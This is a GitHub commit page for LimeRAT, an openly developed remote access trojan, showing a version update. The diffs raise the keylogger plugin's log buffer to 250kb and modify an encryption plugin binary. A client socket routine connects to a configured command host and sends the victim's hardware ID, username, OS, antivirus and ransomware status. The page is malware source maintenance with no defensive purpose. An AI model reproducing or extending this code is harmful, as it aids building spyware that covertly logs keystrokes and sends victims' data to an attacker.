Skip to content
This repository has been archived by the owner on Jun 25, 2019. It is now read-only.

Commit

Permalink
UPDATE 0.1.7.3
Browse files Browse the repository at this point in the history
fixed server log error sound bug
keylogger max size 250kb instead of 50kb
updated limerat icon
  • Loading branch information
Nyrotication committed Aug 19, 2018
1 parent d1d1bbe commit f9f396a
Show file tree
Hide file tree
Showing 32 changed files with 50,326 additions and 5,943 deletions.
Binary file modified .vs/LimeRAT/DesignTimeBuild/.dtbcache
Binary file not shown.
Binary file modified .vs/LimeRAT/v15/.suo
Binary file not shown.
Binary file modified .vs/LimeRAT/v15/Server/sqlite3/storage.ide
Binary file not shown.
Binary file modified .vs/LimeRAT/v15/Server/sqlite3/storage.ide-shm
Binary file not shown.
Binary file modified .vs/LimeRAT/v15/Server/sqlite3/storage.ide-wal
Binary file not shown.
17 changes: 17 additions & 0 deletions LimeRAT.sln
Original file line number Diff line number Diff line change
Expand Up @@ -4,6 +4,23 @@ Microsoft Visual Studio Solution File, Format Version 12.00
VisualStudioVersion = 15.0.27703.2000
MinimumVisualStudioVersion = 10.0.40219.1
Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "Server", "Project\Server\Server.vbproj", "{B672DE08-269D-4AA6-8535-D3BC59BB086B}"
ProjectSection(ProjectDependencies) = postProject
{CFE81801-C2C5-4444-BE67-64EFFEFDCD73} = {CFE81801-C2C5-4444-BE67-64EFFEFDCD73}
{73EF1630-1208-43C5-9E3F-19A2923875C5} = {73EF1630-1208-43C5-9E3F-19A2923875C5}
{2B47F84C-9CA3-47E9-9970-8AF8233A9F12} = {2B47F84C-9CA3-47E9-9970-8AF8233A9F12}
{73ECE052-4218-465D-AA2E-A2D03448BEDD} = {73ECE052-4218-465D-AA2E-A2D03448BEDD}
{D47C706B-152F-46B5-840A-4EBB2CFAFE33} = {D47C706B-152F-46B5-840A-4EBB2CFAFE33}
{CF8C386C-46B2-4F40-BCB1-774C01E72B1C} = {CF8C386C-46B2-4F40-BCB1-774C01E72B1C}
{8F71C671-F53C-4F4F-98B9-8B8D3263C0DB} = {8F71C671-F53C-4F4F-98B9-8B8D3263C0DB}
{55625889-F7BB-4533-9702-DDE98FBB0DDF} = {55625889-F7BB-4533-9702-DDE98FBB0DDF}
{E211C5CD-85F0-48D2-A18F-2E59AD47DDC3} = {E211C5CD-85F0-48D2-A18F-2E59AD47DDC3}
{733C37D8-858F-44EE-9D17-790F7DE9C040} = {733C37D8-858F-44EE-9D17-790F7DE9C040}
{27CF1AE0-5FDE-4B31-A4DA-6FAD1D77351D} = {27CF1AE0-5FDE-4B31-A4DA-6FAD1D77351D}
{363A6DE4-59D9-451B-A4FD-1FE763970E1E} = {363A6DE4-59D9-451B-A4FD-1FE763970E1E}
{AF0885E4-9E3B-49CA-9F13-0F869E8BF89D} = {AF0885E4-9E3B-49CA-9F13-0F869E8BF89D}
{9C30CAE4-6FBE-45CC-90C2-1D739DB92E86} = {9C30CAE4-6FBE-45CC-90C2-1D739DB92E86}
{A0E096FB-3AEF-41B5-A67B-BD90D2FEBBFC} = {A0E096FB-3AEF-41B5-A67B-BD90D2FEBBFC}
EndProjectSection
EndProject
Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "Client", "Project\Client\Client.vbproj", "{1E2A1E78-ED0B-414B-A956-86232B1025BE}"
EndProject
Expand Down
2 changes: 1 addition & 1 deletion Project/Client/C_Main.vb
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
'##################################################################
'## N Y A N C A T ||| Updated on Aug/18/2018 ##
'## N Y A N C A T ||| Updated on Aug/19/2018 ##
'##################################################################
'## ##
'## ##
Expand Down
2 changes: 1 addition & 1 deletion Project/Client/C_Socket.vb
Original file line number Diff line number Diff line change
Expand Up @@ -98,7 +98,7 @@ e: ' clear things and ReConnect
C.Client.Connect(C_Settings.HOST, C_Settings.PORT)
CNT = True
'Send info to server
Send(String.Concat("info", SPL, C_ID.HWID, SPL, C_ID.UserName, SPL, "v0.1.7.2A", SPL, C_ID.MyOS, " ", C_ID.Bit, SPL,
Send(String.Concat("info", SPL, C_ID.HWID, SPL, C_ID.UserName, SPL, "v0.1.7.3", SPL, C_ID.MyOS, " ", C_ID.Bit, SPL,
C_ID.INDATE, SPL, C_ID.AV, SPL, C_ID.Rans, SPL, C_ID.USBSP, SPL, " ", SPL, " "))
Catch ex As Exception
Threading.Thread.CurrentThread.Sleep(R.Next(5000))
Expand Down
Binary file modified Project/Plugins/ENC/Resources/DECF.exe
Binary file not shown.
2 changes: 1 addition & 1 deletion Project/Plugins/KLG/Main.vb
Original file line number Diff line number Diff line change
Expand Up @@ -135,7 +135,7 @@ Public Class Main
Next
If lp = 1000 Then
lp = 0
Dim mx As Integer = 50 * 1024 'refresh after 100kb
Dim mx As Integer = 250 * 1024 'refresh after 250kb
If Logs.Length > mx Then
Logs = Logs.Remove(0, Logs.Length - mx)
End If
Expand Down
63 changes: 48 additions & 15 deletions Project/Server/Forms/About.Designer.vb

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

Loading

0 comments on commit f9f396a

Please sign in to comment.